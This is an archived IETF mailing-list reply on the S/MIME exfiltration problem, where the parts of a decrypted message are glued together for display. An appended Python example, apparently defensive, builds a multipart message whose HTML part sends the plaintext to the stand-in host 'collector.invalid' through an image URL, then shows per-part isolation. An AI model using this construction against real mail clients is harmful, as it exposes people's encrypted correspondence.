Re: More mail madness?

Paul Wouters <paul@nohats.ca> Mon, 14 May 2018 16:35 UTC

Subject: Re: More mail madness?
From: Paul Wouters <paul@nohats.ca>
In-Reply-To: <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com>
Date: Mon, 14 May 2018 12:35:06 -0400
Cc: Phillip Hallam-Baker <phill@hallambaker.com>, IETF <ietf@ietf.org>
Message-Id: <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca>
References: <CAMm+LwiOfdptL6u=SyCtQnz7xKrJD6HTDkKs+JGeHf54CSiv8A@mail.gmail.com> <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com>
To: Russ Housley <housley@vigilsec.com>
Archived-At: <https://mailarchive.ietf.org/arch/msg/ietf/AF5AVZ8TEY1Cfmjg5cw66Ic_5D0>

> On May 14, 2018, at 12:29, Russ Housley <housley@vigilsec.com> wrote:
> 
> We are working on text for S/MIME that says that each portion of a MIME multi-part needs to be handled in its own sandbox.  The direct exfiltration that is described happens because the mail user agent glues the various portions together for display to the user, which in the example on the web page causes an image to be fetched from the attacker's website with the message plaintext as part of the URL.

So that’s the bandaid. What and where will work be done on a solution?

Paul
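
The per-part handling described in the quoted text, sketched as an added example that is not part of the original message or of any mail client's code: it compares a renderer that joins all MIME parts into one HTML document with one that treats each part as its own document. The sample message, the host `collector.invalid`, all function names and the open-tag heuristic are assumptions made for illustration.

```python
from email import message_from_string
from html.parser import HTMLParser

# Constructed sample (not from the thread): the middle part stands in for
# decrypted S/MIME plaintext; the first part leaves an attribute unterminated.
SAMPLE = (
    'MIME-Version: 1.0\n'
    'Content-Type: multipart/mixed; boundary="B"\n\n'
    '--B\nContent-Type: text/html\n\n<img src="http://collector.invalid/\n'
    '--B\nContent-Type: text/plain\n\nSECRET PLAINTEXT\n'
    '--B\nContent-Type: text/html\n\n">\n'
    '--B--\n'
)

class RemoteRefs(HTMLParser):
    """Collects every src/href value a renderer would be asked to load."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        self.urls += [v for k, v in attrs if k in ("src", "href") and v]

def refs(html):
    parser = RemoteRefs()
    parser.feed(html)
    parser.close()
    return parser.urls

def leaf_parts(msg):
    return [p for p in msg.walk() if not p.is_multipart()]

def render_glued(msg):
    """Models the flawed behaviour: all parts joined into one HTML document."""
    return refs("".join(p.get_payload() for p in leaf_parts(msg)))

def render_isolated(msg):
    """Each part is its own document; returns (urls, indexes of suspect parts)."""
    urls, suspect = [], []
    for i, part in enumerate(leaf_parts(msg)):
        if part.get_content_type() != "text/html":
            continue  # plaintext is never interpreted as markup
        body = part.get_payload()
        if body.rfind("<") > body.rfind(">"):
            suspect.append(i)  # heuristic (assumption): part ends inside an open tag
        urls += refs(body)
    return urls, suspect
```

With the constructed sample, the glued renderer yields one image URL that carries the plaintext, while the isolated renderer yields no URL and flags part 0 for review.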